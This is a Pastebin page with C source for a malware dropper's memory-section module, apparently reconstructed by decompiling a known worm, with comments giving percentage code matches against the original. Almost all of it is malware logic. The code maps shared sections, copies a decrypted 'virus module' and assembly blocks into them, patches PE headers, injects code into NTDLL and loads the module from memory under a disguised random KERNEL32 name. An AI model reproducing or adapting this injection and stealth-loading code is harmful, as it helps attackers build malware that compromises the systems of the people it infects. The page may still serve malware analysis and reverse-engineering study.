Advertisement
FlyFar

dropper_MemorySections.c

Feb 19th, 2023
443
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.81 KB | Cybersecurity | 0 0
  1. #include "6. MemorySections.h"
  2. #include "4. Encoding.h"
  3. #include "5. Utils.h"
  4. #include "7. AssemblyBlock0.h"
  5. #include "8. AssemblyBlock1.h"
  6. #include "9. AssemblyBlock2.h"
  7. #include "A. EncodingAlgorithms.h"
  8. #include "C. CodeBlock.h"
  9.  
  10. #include "config.h"
  11. #include "define.h"
  12.  
  13. // Create the shared section, copy the content
  14. // of pUnknownSegment and the decrypted module
  15.  
  16. // 95% (C) CODE MATCH
  17. INT32 LoadVirusModuleSection(HANDLE hHandle, PGENERAL_INFO_BLOCK sInfoBlock, PVOID pVirusModule, INT32 pVirusModuleSize, INT32 iExecEntryNumber, PVOID pUnknownSegment, DWORD pUnknownSegmentSize, PVOID *ppModuleBlock)
  18. {
  19.     HANDLE hMapHandle; // [sp+4h] [bp-28h]@1
  20.     PVOID pVirusImageBase; // [sp+8h] [bp-24h]@3
  21.     PIMAGE_NT_HEADERS pImageNT; // [sp+Ch] [bp-20h]@6
  22.     INT32 iSectionPointer; // [sp+10h] [bp-1Ch]@1
  23.     PVOID pLocalReg; // [sp+14h] [bp-18h]@1
  24.     PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-14h]@3
  25.     UINT32 iSectionsSize; // [sp+1Ch] [bp-10h]@1
  26.     PVOID pRemoteReg; // [sp+20h] [bp-Ch]@1
  27.     PVIRUS_MODULE_BLOCKS_HEADER sVirusModuleBlocksHeader; // [sp+24h] [bp-8h]@3
  28.     INT32 nRet; // [sp+28h] [bp-4h]@1
  29.  
  30.     pLocalReg       = 0;
  31.     pRemoteReg      = 0;
  32.    
  33.     iSectionPointer = 0;
  34.     iSectionsSize   = sizeof(VIRUS_MODULE_BLOCKS_HEADER) + pUnknownSegmentSize + pVirusModuleSize;
  35.    
  36.     // Here we create a shared MapOfView between the current process and the HANDLE at hHandle
  37.     nRet = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pLocalReg, &pRemoteReg);
  38.     HAS_FAILED(nRet, nRet)
  39.    
  40.     // First part of the section dedicated to the VIRUS_MODULE_BLOCKS_HEADER
  41.     sVirusModuleBlocksHeader = (PVIRUS_MODULE_BLOCKS_HEADER)pLocalReg;
  42.     pLocalReg                = (LPVOID)((DWORD)pLocalReg + sizeof(VIRUS_MODULE_BLOCKS_HEADER));
  43.     iSectionPointer          = sizeof(VIRUS_MODULE_BLOCKS_HEADER);
  44.    
  45.     // Copy the content of pUnknownSegment into the shared section
  46.     CopySegmentIntoSections(&pLocalReg, pRemoteReg, &iSectionPointer, &sVirusModuleBlocksHeader->UnknownSegment, pUnknownSegment, pUnknownSegmentSize);
  47.     pVirusImageBase = pLocalReg;
  48.    
  49.     // Copy the decrypted module into into the shared section
  50.     CopySegmentIntoSections(&pLocalReg, pRemoteReg, &iSectionPointer, &sVirusModuleBlocksHeader->VirusModuleSegment, pVirusModule, pVirusModuleSize);
  51.     pImageDOS = (PIMAGE_DOS_HEADER)pVirusImageBase;
  52.    
  53.     // Check the memory copied (len >= 0x1000), MZ header etc.
  54.     if((UINT32)pVirusModuleSize >= 0x1000 &&
  55.        pImageDOS->e_magic == MZ_HEADER &&
  56.        pImageDOS->e_lfanew + sizeof(IMAGE_OPTIONAL_HEADER) + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD) < (UINT32)pVirusModuleSize) // (UINT32 *)pImageDOS[15] + 248 -> Section ".text"
  57.     {
  58.         // Check the "Delay Import Directory Size" and change it, not sure why
  59.         pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusImageBase + pImageDOS->e_lfanew);
  60.         if(pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size == 72)
  61.             pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size = 64; // Change Delay Import Directory Size
  62.     }
  63.    
  64.     // Copy the sInfoBlock
  65.     __memcpy(&sVirusModuleBlocksHeader->InformationBlock, sInfoBlock, sizeof(GENERAL_INFO_BLOCK));
  66.    
  67.     // Copy the entrypoint of the module
  68.     sVirusModuleBlocksHeader->LibraryExecuteEntryNumber = iExecEntryNumber;
  69.     sVirusModuleBlocksHeader->VirusModulePointer        = 0;
  70.    
  71.     // Copy the pointer to the module block (section) just created
  72.     *ppModuleBlock = pRemoteReg;
  73.    
  74.     // Close all and return
  75.     _F(UnmapViewOfFile)(sVirusModuleBlocksHeader);
  76.     _F(ZwClose)(hMapHandle);
  77.  
  78.     return 0;
  79. }
  80.  
  81. // 96% (C) CODE MATCH
  82. INT32 LoadAndInjectVirus(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader, PVIRUS_MODULE_BLOCKS_HEADER sVirusModuleBlocksHeader, PGENERAL_INFO_BLOCK sInfoBlock)
  83. {
  84.     HMODULE pVirusModule; // [sp+0h] [bp-90h]@5
  85.     HANDLE hMappedAddress; // [sp+4h] [bp-8Ch]@7
  86.     INT32 iResult; // [sp+8h] [bp-88h]@1
  87.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+Ch] [bp-84h]@1
  88.     GENERAL_INFO_BLOCK sInfoBlockCopy; // [sp+10h] [bp-80h]@1
  89.  
  90.     __memcpy(&sInfoBlockCopy, sInfoBlock, sizeof(GENERAL_INFO_BLOCK)); // Copy the information
  91.    
  92.     sInfoBlockCopy.OriginalAddress ^= X_PTR_KEY; // Get the original address of the variable sInfoBlock
  93.     sInfoBlockCopy.UnknownZero0     = 0;
  94.    
  95.     // Point to the first block of assembly in the section
  96.     pHardAddrs = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
  97.    
  98.     iResult = BLOCK4_LoadVirusModuleInfo(pHardAddrs, &sInfoBlockCopy, (PVOID)sVirusModuleBlocksHeader->VirusModuleSegment.SegmentAddress, sVirusModuleBlocksHeader->VirusModuleSegment.SegmentSize);
  99.     if(iResult) return iResult;
  100.    
  101.     if(BLOCK4_InjectCodeIntoNTDLL(sASMCodeBlocksHeader, pHardAddrs)) return -4;
  102.    
  103.     /* Load library from the memory */
  104.     pVirusModule = pHardAddrs->LoadLibraryW(sInfoBlockCopy.RandomLibraryName);
  105.     if(!pVirusModule) return -9;
  106.    
  107.     sVirusModuleBlocksHeader->VirusModulePointer = pVirusModule;
  108.     hMappedAddress = sInfoBlockCopy.MappedAddress;
  109.    
  110.     if(sInfoBlockCopy.MappedAddress)
  111.     {
  112.         sInfoBlockCopy.MappedAddress = 0;
  113.         pHardAddrs->ZwClose(hMappedAddress);
  114.     }
  115.    
  116.     return 0;
  117. }
  118.  
  119. // 100% (C) CODE MATCH
  120. DWORD GetCodeBlockSize(void)
  121. {
  122.     return _SIZE(BLOCK4_END, BLOCK4_InjectAndExecuteVirus);
  123. }
  124.  
  125. // 100% (C) CODE MATCH
  126. DWORD GetCodeBlock(void)
  127. {
  128.     return (DWORD)BLOCK4_InjectAndExecuteVirus;
  129. }
  130.  
  131. // 100% (C) CODE MATCH
  132. DWORD GetRelativeExecuteLibraryPointer(void)
  133. {
  134.     return _SIZE(BLOCK4_ExecuteLibrary, BLOCK4_InjectAndExecuteVirus);
  135. }
  136.  
  137. // 100% (C) CODE MATCH
  138. UINT32 GetRelativeAlignAddressesPointer(void)
  139. {
  140.     return _SIZE(BLOCK4_AlignAddresses, BLOCK4_InjectAndExecuteVirus);
  141. }
  142.  
  143. // 85% (C) CODE MATCH -> NEED DEBUG
  144. INT32 LoadCodeSection(HANDLE hHandle, PVOID pVirusModuleSection, PVOID *ppCodeBlock, PVOID *ppASMBlock)
  145. {
  146.     PVOID pCodeBlock; // eax@3
  147.     HANDLE hMapHandle; // [sp+8h] [bp-28h]@1
  148.     INT32 iASMBlock1Pointer; // [sp+Ch] [bp-24h]@3
  149.     DWORD *v9; // [sp+10h] [bp-20h]@3
  150.     INT32 iSectionPointer; // [sp+14h] [bp-1Ch]@1
  151.     PVOID pLocal; // [sp+18h] [bp-18h]@1
  152.     UINT32 iSectionsSize; // [sp+1Ch] [bp-14h]@1
  153.     PVOID pRemote; // [sp+20h] [bp-10h]@1
  154.     PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader; // [sp+24h] [bp-Ch]@3
  155.     UINT32 iCodeBlockSize; // [sp+28h] [bp-8h]@1
  156.     INT32 nRet; // [sp+2Ch] [bp-4h]@1
  157.  
  158.     pLocal = 0;
  159.     pRemote = 0;
  160.    
  161.     iCodeBlockSize = GetCodeBlockSize(); // [0xB3A] (2874)
  162.     iSectionsSize  = sizeof(ASM_CODE_BLOCKS_HEADER) + _SIZE(__ASM_BLOCK1_0, __ASM_BLOCK0_0) + _SIZE(DecodeModuleNameA, __ASM_BLOCK1_0) + iCodeBlockSize;
  163.    
  164.     iSectionPointer = 0;
  165.    
  166.     // Create the shared section
  167.     nRet = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pLocal, &pRemote);
  168.     HAS_FAILED(nRet, nRet)
  169.    
  170.     // First part of the section dedicated to the ASM_CODE_BLOCKS_HEADER
  171.     sASMCodeBlocksHeader = (PASM_CODE_BLOCKS_HEADER)pLocal;
  172.     pLocal               = (LPVOID)((DWORD)pLocal + sizeof(ASM_CODE_BLOCKS_HEADER));
  173.     iSectionPointer      = sizeof(ASM_CODE_BLOCKS_HEADER);
  174.    
  175.     // Copy the 1st block of ASM code into the shared section
  176.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->ASMBlock1Segment, __ASM_BLOCK1_0, _SIZE(DecodeModuleNameA, __ASM_BLOCK1_0));
  177.     iASMBlock1Pointer = iSectionPointer;
  178.    
  179.     // Copy the 2nd block of ASM code into the shared section
  180.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->ASMBlock0Segment, __ASM_BLOCK0_0, _SIZE(__ASM_BLOCK1_0, __ASM_BLOCK0_0));
  181.     pCodeBlock = (PVOID)GetCodeBlock();
  182.    
  183.     // Copy the 3st block of ASM code into the shared section
  184.     CopySegmentIntoSections(&pLocal, pRemote, &iSectionPointer, &sASMCodeBlocksHeader->CodeBlockSegment, pCodeBlock, iCodeBlockSize);
  185.    
  186.     // Copy the address of __ASM_REF_3 in the __ASM_BLOCK0_1
  187.     v9 = (DWORD *)((DWORD)sASMCodeBlocksHeader + iASMBlock1Pointer + _SIZE(__ASM_BLOCK0_1, __ASM_BLOCK0_0));
  188.     *v9 = (DWORD)sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(__ASM_REF_3, __ASM_BLOCK1_0);
  189.    
  190.     // Put function address into the memory map
  191.     sASMCodeBlocksHeader->ExecuteLibrary = sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress + GetRelativeExecuteLibraryPointer();
  192.     sASMCodeBlocksHeader->AlignAddresses = sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress + GetRelativeAlignAddressesPointer();
  193.     sASMCodeBlocksHeader->VirusModuleSection = (DWORD)pVirusModuleSection;
  194.    
  195.     // Put the values in the pointers
  196.     *ppCodeBlock    = (PVOID)sASMCodeBlocksHeader->CodeBlockSegment.SegmentAddress;
  197.     *ppASMBlock     = pRemote;
  198.    
  199.     // Close all and return
  200.     _F(UnmapViewOfFile)(sASMCodeBlocksHeader);
  201.     _F(ZwClose)(hMapHandle);
  202.    
  203.     return 0;
  204. }
  205.  
  206. static BOOL bSetupMode = TRUE;
  207.  
  208. static PVOID s_ASMCodeBlocksPTR = NULL;
  209. static PVOID s_virusBlocksPTR   = NULL;
  210. static PVOID s_codeBlockPTR     = NULL;
  211.  
  212. // 98% (C) CODE MATCH
  213. INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, DWORD iVirusModuleSize, HMODULE *hVirusModule)
  214. {
  215.     INT32 nRet;
  216.     GENERAL_INFO_BLOCK sInfoBlock;
  217.  
  218.     // Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX"
  219.     if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0)
  220.         return 0;
  221.    
  222.     // Decrypt the Kernel32's and NTDLL's function names
  223.     if(bSetupMode && DecodeEncryptedModuleNames() == FALSE)
  224.         return -12;
  225.    
  226.     // Create the shared section and copy the data
  227.     nRet = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
  228.     HAS_FAILED(nRet, nRet)
  229.    
  230.     // If it is still in setup mode load the code
  231.     if(bSetupMode)
  232.     {
  233.         // Create the shared section and copy the code
  234.         nRet = LoadCodeSection(GetCurrentProcess(), s_virusBlocksPTR, &s_codeBlockPTR, &s_ASMCodeBlocksPTR);
  235.         HAS_FAILED(nRet, nRet)
  236.        
  237.         bSetupMode = FALSE;
  238.     }
  239.    
  240.     // Unknown
  241.     nRet = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock);
  242.     if(!nRet)
  243.         *hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;
  244.    
  245.     _F(UnmapViewOfFile)(s_virusBlocksPTR);
  246.    
  247.     return nRet;
  248. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement